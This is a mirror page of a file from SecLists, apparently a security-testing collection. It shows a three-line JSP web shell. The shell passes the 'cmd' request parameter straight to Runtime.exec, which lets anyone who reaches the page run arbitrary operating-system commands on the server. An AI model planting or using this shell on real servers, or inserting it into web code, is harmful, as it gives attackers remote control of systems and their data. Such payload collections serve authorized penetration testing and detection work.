mirror of
https://github.com/danielmiessler/SecLists
synced 2026-04-01 19:15:00 +02:00
3 lines
63 B
Text
3 lines
63 B
Text
<%
|
|
Runtime.getRuntime().exec(request.getParameter("cmd"));
|
|
%>
|